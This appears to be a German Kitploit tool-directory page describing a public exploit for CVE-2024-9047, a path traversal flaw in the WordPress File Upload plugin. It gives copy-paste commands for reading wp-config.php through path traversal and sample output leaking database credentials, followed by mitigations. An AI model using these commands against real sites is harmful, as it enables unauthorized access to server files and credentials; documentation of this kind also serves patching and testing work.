Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-9047-Exploit — Exploit für WordPress File Upload Plugin - Alle Versionen bis 4.24.11 sind anfällig. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-9047-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

Exploit für WordPress File Upload Plugin - Alle Versionen bis 4.24.11 sind anfällig.

Repository anzeigen
41vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-9047: Exploit für WordPress File Upload Plugin

Beschreibung

Das WordPress File Upload Plugin für WordPress weist eine Path Traversal-Sicherheitslücke in allen Versionen bis einschließlich 4.24.11 über die Datei wfu_file_downloader.php auf. Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, Dateien außerhalb des vorgesehenen Verzeichnisses zu lesen oder zu löschen. Eine erfolgreiche Ausnutzung erfordert, dass die betroffene WordPress-Installation PHP 7.4 oder früher ausführt.

Auswirkungen

  • Schweregrad: Kritisch
  • CVSS-Score: 9.8 (Kritisch)
  • Angriffsvektor: Netzwerk
  • Erforderliche Authentifizierung: Nein

Ausnutzung

Ein Angreifer kann diese Schwachstelle ausnutzen, indem er eine speziell gestaltete Anfrage an den gefährdeten Endpunkt wfu_file_downloader.php sendet und den Dateipfad-Parameter manipuliert, um unbefugten Zugriff auf sensible Dateien auf dem Server zu erhalten.


Exploit-Details

Voraussetzungen

  • Die betroffene WordPress-Installation muss das anfällige Plugin installiert haben (Version 4.24.11 oder früher).
  • Der Server muss PHP-Version 7.4 oder früher ausführen.

Schritte zur Ausnutzung

  1. Klonen Sie dieses Repository:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. Installieren Sie Python-Abhängigkeiten (falls erforderlich):

    root@kitploit:~
    pip install requests
    
  3. Führen Sie das Skript aus, um die Plugin-Version zu überprüfen und die Schwachstelle auszunutzen:

    root@kitploit:~
    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

Beispielverwendung

Um die standardmäßig anfällige Konfiguration auszunutzen und die WordPress-Konfigurationsdatei zu lesen:

root@kitploit:~
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

Ergebnis

root@kitploit:~
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


Gegenmaßnahmen

Um Ihre WordPress-Site zu schützen:

  1. Aktualisieren Sie das WordPress File Upload Plugin auf die neueste Version.
  2. Stellen Sie sicher, dass die PHP-Version auf eine unterstützte Version (höher als 7.4) aktualisiert wird.
  3. Beschränken Sie Dateiberechtigungen, um unbefugten Zugriff auf sensible Dateien zu verhindern.
  4. Verwenden Sie eine Web Application Firewall (WAF), um bösartige Anfragen zu blockieren.

Haftungsausschluss

Dieser Code dient ausschließlich zu Bildungs- und Forschungszwecken. Die unbefugte Verwendung dieses Skripts auf Systemen, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch. Die Autoren übernehmen keinerlei Verantwortung für den Missbrauch dieses Codes.

Tool herunterladen